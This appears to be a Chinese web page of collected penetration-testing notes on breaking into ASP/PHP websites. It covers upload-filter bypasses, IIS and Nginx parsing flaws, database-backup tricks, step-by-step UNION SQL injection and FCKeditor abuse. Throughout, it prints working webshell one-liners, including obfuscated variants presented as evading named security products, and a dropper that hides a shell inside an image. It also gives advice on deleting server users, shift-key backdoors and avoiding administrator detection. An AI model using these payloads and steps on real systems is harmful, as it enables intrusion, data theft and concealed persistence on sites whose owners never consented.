滲透測試筆記彙總

時間 2019-11-13

標籤滲透測試筆記彙總简体版

原文原文鏈接

【拿shell 】
1.直接上傳asp asa jsp cer php aspx htr cdx 格式的木馬，不行就利用IIS6.0解析漏洞":1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls
2.上傳圖片木馬遇到攔截系統，連圖片木馬都上傳不了，記事本打開圖片木馬在代碼最前面加上gif89a，通常就能逃過攔截系統了。
3.上傳圖片木馬把地址複製到數據庫備份裏備份成asp木馬，有時不成功就利用IIs6.0解析漏洞嘗試突破。
4.上傳圖片木馬再用抓包工具進行抓包，用明小子的綜合上傳功能，複製上傳地址及cookies填到對應的框裏，點擊上傳便可。
5.當後臺有數據庫備份蛋沒有上傳點時，把一句話木馬插到任意處，再到數據庫備份裏備份成asp木馬，以後用一句話客戶端鏈接木馬便可。javascript

6.後臺點擊修改密碼，新密碼設置爲：1":eval request("h")’設置成功後鏈接asp/config.asp便可拿下shell
7.當頁面提示「上傳格式不正確[從新上傳]」則說明存在上傳漏洞，複製地址放到明小子裏上傳，通常都能直接拿下shell。
8.當後臺沒有數據庫備份但有數據庫恢復的狀況下，請不要猶豫，數據庫恢復跟數據庫備份功能是同樣的，直接邪惡吧。
9.若是知道網站的數據庫是asp的，直接在前臺找留言板插入一句話木馬，鏈接配置文件inc/config.asp便可拿下shell。
10.當網站前臺有「會員註冊」註冊一個帳戶進去看看有沒有上傳點，有的話直接上傳asp木馬以及利用iis6.0解析漏洞，不行就抓包用明小子上傳。
11.先上傳一個.ashx的文件，在筆記裏搜索可找到方法，結果是訪問會生成一句話木馬文件，後臺上傳、編輯器上傳、上傳漏洞頁面都可使用此方法。
12.當頁面提示只能上傳jpg|gif|png等格式的時候，右鍵查看源文件，本地修改成asp|asa|php再本地上傳便可拿下shell。
13.當用啊D檢測注入點提示SA權限或DB權限的時候，嘗試列目錄找到網站物理路徑，再點擊cmd/上傳，直接上傳asp木馬便可，不行就差別備份拿shell。
14.對於一些上傳漏洞的上傳頁面，以及後臺找到的上傳頁面，能夠嘗試用本地雙文件上傳突破，第一個選jpg第二個選cer，推薦使用火狐瀏覽器。
【滲透技巧】php

1.某些cms的網站設置過濾不嚴，直接在網站後面加上admin/session.asp 或 admin/left.asp 能夠繞事後臺驗證直接進去後臺。
2.提下服務器以後建議抓下管理員哈希值，而後刪除全部用戶包括本身的，之後登陸這臺服務器就用管理員的帳號密碼登陸，這樣比較安全。
3.入侵網站以前鏈接下3389，能夠鏈接上的話先嚐試弱口令，不行就按5次shift鍵，看看有沒有shift後門。
4.訪問後臺地址時彈出提示框「請登錄」把地址記出來(複製不了)放到「網頁源代碼分析器」裏，選擇瀏覽器-攔截跳轉勾選--查看便可直接進入後臺。
5.突破防盜鏈系統訪問shell代碼：javascript:document.write("<a href='http://www.xxx.com/uploadfile/1.asp'>fuck</a>") 點擊GO便可進入shell。
6.遇到一流信息監控攔截系統時，上傳圖片木馬或是在木馬代碼最前面加上gif89a便可逃過檢測。
7.eweb編輯器後臺，增長了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了，嘗試增長一個aaspsp，再上傳asp就會解析了。
8.用注入工具猜解到表段卻猜解不到字段的時候，到網站後臺右鍵查看源文件，通常帳號密碼後面的就是字段，以後在注入工具裏添加字段進行猜解便可。
9.當注入工具猜解表段，但猜解字段時提示長度超過50之類，不妨扔到穿山甲去猜解一下。
10.得知表段跟字段以後，使用SQL語句在ACCESS數據庫里加個用戶名及密碼的語句：Insert into admin(user,pwd) values('jianmei','daxia')
11.當得到管理員密碼殊不知道管理員賬號時，到網站前臺找新聞連接，通常「提交者」「發佈者」的名字就是管理員的賬號了。
12.爆破ASP+IIS架設的網站web絕對路徑，假設網站主頁爲：http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/，fkbhvv.aspx是不存在的。
13.有的站長很懶什麼也不改，當咱們得知網站的cms的時候，不妨去下載一套找找數據庫路徑，以及敏感信息，再嘗試默認相關的可利用資源。
14.菜刀裏點擊一句話木馬右鍵，選擇虛擬機終端，執行命令出現亂碼時，返回去設置編碼那裏，將默認的GB2312改成UTF-8.
15.入侵千萬別忘了ftp，試試諾口令，ftp的默認端口：21 默認賬號密碼：test
16.破解出md5爲20位結果，只須要把前三位和後一位去掉，剩餘16位拿去解密便可
17.好多網站的後臺地址是：admin_index.asp manage_login.asp
18.有時在木馬代碼里加上了gif89a，上傳成功訪問的時候卻出現了像圖片同樣的錯誤圖像，說明服務器把gif89a當作圖片來處理了，不要帶gif89a便可。問就能夠了。
19.找eweb編輯器的時候，若是默認的被改了，到前臺去找圖片右鍵看下路徑，根據圖片的目錄猜eweb編輯器的目錄，後臺也是用此思路。
20.IIS註冊表全版本泄漏用戶路徑和FTP用戶名漏洞：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\
21.掃旁站的時候，是否是想看每一個站點是什麼cms呢？用軒轅劍掃描就能夠顯示系統特徵。
22.網站的主站通常都很安全，這時就要旁註或C段了，可是想知道各個IP段開放了什麼端口嗎？用「啊D網絡工具包」裏面的IP端口掃描最理想了。
23.手工檢測注入點彈出「你的操做已被記錄!」之類的信息，訪問這個文件：sqlin.asp，若是存在，在注入點後面植入一句話木馬：‘excute(request("TNT"))
接着用一句話木馬客戶端鏈接：http://www.xxx.com/sqlin.asp，上傳木馬便可拿下shell，由於不少防注入程序都是用」sqlin.asp「這個文件名來作非法記錄的數據庫。
24.有的後臺不顯示驗證碼，往註冊表裏添加一個ceg便可突破這個困境了，把下面的代碼保存爲Code.reg，雙擊導入就能夠了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
25.內網滲透時儘可能少登陸3389，以避免被管理員發現；
26.旁註的時候，建議挑php的站點來日，由於php站點通常都支持aspx腳本，這樣對於提權跟跨目錄都輕鬆.!
【手工注入】
IE瀏覽器-工具-Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉，不然不論服務器返回什麼錯誤，IE都只顯示爲HTTP 500服務器錯誤，不能得到更多的信息。
手工注入時若是網站過濾了 and 1=1 and 1=2 ，能夠用xor 1=1 xor 1=2 進行判斷。html

第一步：找注入點
（數字型）http://www.xxx.com/show.asp?id=7
加'           程序報錯
加and 1=1     返回正常頁面
加and 1=2     返回錯誤頁面java

（字符型）http://www.xxx.com/show.asp?id=ade7
加' 程序報錯
加'and '1'='1 返回正常頁面
加'and '1'='2 返回錯誤頁面mysql

新型檢測注入點的方法：
在URL地址後面加上-1，若返回的頁面和前面不一樣，是另外一個正常的頁面，則表示存在注入漏洞，並且是數字型的注入漏洞。
在URL地址後面加上-0，若返回的頁面和以前的頁面相同，而後加上-1，返回錯誤頁面，則也表示存在注入漏洞，並且是數字型的。web

若是報錯提示這個：
Microsoft JET Database Engine 錯誤 '80040e14'
語法錯誤 (操做符丟失) 在查詢表達式 'ID = 6 ord by' 中。
/fun/Function.asp，行 657sql

解明：經過 JET 引擎鏈接數據庫，則是 Access數據庫，經過 ODBC 引擎鏈接數據庫，則是 MSSQL數據庫。shell

第二步：猜字段數
語句：order by 5
若是猜6的時候返回出錯，就繼續往回猜，直到返回正確爲止...數據庫

第三步：UNION命令
語句：and 1=2 union select 1,2,3,4,5--
看看哪裏能夠替換，假如顯示有2，就在2這裏替換SCHEMA_NAME，見下瀏覽器

第三步：猜庫名
語句：and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1

第四步：猜表段
語句：and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1
注意，TABLE_SCHEMA=後面的庫名必須是hex轉換過的格式，倒數第二個1一直替換，直到爆出全部表段，而後選最可能性的那個。

第五步：猜字段
and 1=2 union select 1,COLUMN_NAME,3,4,5 from information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1
注意，TABLE_SCHEMA=後面的表段必須是hex轉換過的格式，倒數第二個1一直替換，直到爆出全部字段，而後選最可能性的那兩個。

第六步：猜內容
語句一：and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
首先讓程序報錯，因此在注入點後面加上 and 1=2
語句二：http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin
一樣是先讓程序報錯，在178這個參數前面加上 -
當列名賬號跟列名密碼都猜解對的時候，頁面將會顯示相對應的內容，通常的密碼都通過MD5加密了，解密地址：http://www.chamd5.org/;（朋友的站打個廣告） UserName Password
【常見網站程序】
asp類：
foosun(風訊)
kesion(科汛)

newasp(新雲)
喬客

CreateLive(創力)
5uCMS

KingCMS

DvBBS(動網)
BBSxp

[博客]zblog
[博客]pjblog

PHP類：
DeDeCms（織夢）
ECMS（帝國）

PHPCMS
PHP168
HBcms（宏博）

SupeSite
CMSware(思惟)

Joomla!

[BBS]Discuz!
[BBS]phpWind

[SNS]UCenterHome
[SNS]ThinkSNS

[商城]EcShop
[商城]ShopEx

[博客]WordPress

[維基]HDWiki
[微博]PHPsay

[DIGG]PBdigg

( php開源mysql絕對路徑 )
開源系統             數據庫配置文件名                  文件名所在的目錄
Discuz!              config.inc.php                    ./ config.inc.php
Phpcms               config.inc.php                    ./include/config.inc.php
Wodpress             wp-config.php                     ./ wp-config.php
Phpwind              sqlconfig.php                     ./data/sqlconfig.php
phpweb               config.inc.php                    ./config.inc.php
Php168v6             mysql_config.php                  ./php168/ mysql_config.php
Shopex               config.php                        ./config/config.php
Ecshop               config.php                        ./data/config.php
Joomla               configuration.php                 ./ configuration.php
UCenter              config.inc.php                    ./data/config.inc.php
EmpireCMS            config.php                        ./e/class/config.php
Dedecms              common.inc.php                    .data/common.inc.php
Zen Cart             configure.php                     ./includes/configure.php
Mediawiki            localsettints.php                 ./config/localsettints.php
Ecshop               config.php                        ./data/config.php
osCommerce           configure.php                     ./includes/configure.php

後臺經常使用寫入php一句話（密碼x）：
<?
$fp = @fopen("c.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[x])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>

高強度php一句話：
<?php substr(md5($_REQUEST['heroes']),28)=='acd0'&&eval($_REQUEST['c']);?>

新型變異PHP一句話(密碼b4dboy):
($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句話：
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密碼"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

突破護衛神，保護盾一句話：
<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["test"]); ?>

許多網頁程序都不容許包含〈%%〉標記符號的內容的文件上傳，這樣一句話木馬就寫入不進數據庫了。
改爲：〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉
這樣就避開了使用〈%%〉，保存爲.ASP,程序照樣執行的效果是同樣的。

PHP高強度一句話：
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>   菜刀鏈接：/x.php?x=lostwolf 腳本類型：php 密碼：c
<?php assert($_REQUEST["c"]);?>    菜刀鏈接躲避檢測密碼：c
【解析漏洞總結】
IIS 6.0
目錄解析：/xx.asp/xx.jpg xx.jpg可替換爲任意文本文件(e.g. xx.txt)，文本內容爲後門代碼
IIS6.0 會將 xx.jpg 解析爲 asp 文件。
後綴解析：/xx.asp;.jpg     /xx.asp:.jpg(此處需抓包修改文件名)
IIS6.0 都會把此類後綴文件成功解析爲 asp 文件。
默認解析：/xx.asa    /xx.cer   /xx.cdx
IIS6.0 默認的可執行文件除了 asp 還包含這三種
此處可聯繫利用目錄解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

IIS 7.0/IIS 7.5/Nginx <8.03
在默認Fast-CGI開啓情況下,在一個文件路徑(/xx.jpg)後面加上/xx.php會將 /xx.jpg/xx.php 解析爲 php 文件。
經常使用利用方法：將一張圖和一個寫入後門代碼的文本文件合併將惡意文本寫入圖片的二進制代碼以後，避免破壞圖片文件頭和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二進制[binary]模式
/a 即ascii模式 xx.jpg正常圖片文件
yy.txt 內容 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
意思爲寫入一個內容爲 <?php eval($_POST[cmd])?> 名稱爲shell.php的文件
找個地方上傳 xy.jpg ,而後找到 xy.jpg 的地址，在地址後加上 /xx.php 便可執行惡意文本
.而後就在圖片目錄下生成一句話木馬 shell.php 密碼 cmd
【 fckeditor編輯器】
查看版本：fckeditor/editor/dialog/fck_about.html
編輯器頁面：FCKeditor/_samples/default.html
上傳頁面：fckeditor/editor/filemanager/connectors/test.html
遍歷目錄：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
編輯頁面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
查看文件上傳路徑：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

( 拿shell方法總結 )
ASPX的站幾乎都用fck編輯器，建議用工具掃一下，記住inc目錄下可能存在fck編輯器，掃下這個目錄。
一：若是是iis6.0，上傳兩次 1.asp;.jpg 或者1.asp;1.jpg 或者建立x.asp目錄，再在這個目錄下上傳x.jpg 或者直接上傳1.asp;jpg 均可以完美解析拿下shell
二：第一次上傳1.asp;1.jpg，被重命名爲：1_asp;1.jpg，可是第二次上傳1.asp;1.jpg，就有可能變成：1.asp;1(1).jpg
三：iis7.5+fck的解析文件爲：a.aspx.a;.a.aspx.jpg..jpg.aspx
四：若是不是iis6.0 上傳1.asp;jpg而後抓包，接下來改包，將分號變成空格，再用c32把20改爲00，保存，利用%00 截斷分號兩次
五：成功訪問別人的一句話木馬頁面，http://xxx.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg 但不知道密碼
http://xxx.com/UploadFiles\EditorFile\file\2_asp;2.jpg 這個是圖片木馬，沒有成功利用iis6.0解析漏洞仍是圖片，下載下來用記事本打開找到密碼。六：IIS7.0/7.5 通殺oday，把php一句話木馬後綴改爲1.jpg傳上去，找出一句話的路徑後，在1.jpg的後面添加/.php ( 創建文件夾 . 變 _ 的突破方法 )利用Fiddler web debugger 這款工具來進行修改數據包，從而達到突破的目的。注意：安裝Fiddler web debugger，須要安裝.net環境以及.net的SP2補丁方可運行！1.打開fck的上傳頁面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html2.再打開Fiddler web debugger這款工具，點擊設置--自動斷點--選擇「請求以前」3.接着打開fck的上傳頁面，建立文件夾，並輸入你想要建立的文件名，例如：x.asp4.而後返回到Fiddler web debugger這款工具裏，選擇連接--點擊右側的嗅探5.修改currentfolder內的參數，改爲你要創建的文件夾名字，如：x.asp6.而後點擊右側的：run to completion7.再點擊軟件設置--自動斷點--禁用，再到瀏覽器裏點擊肯定創建文件夾，你就會發現文件夾創建爲x.asp了

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。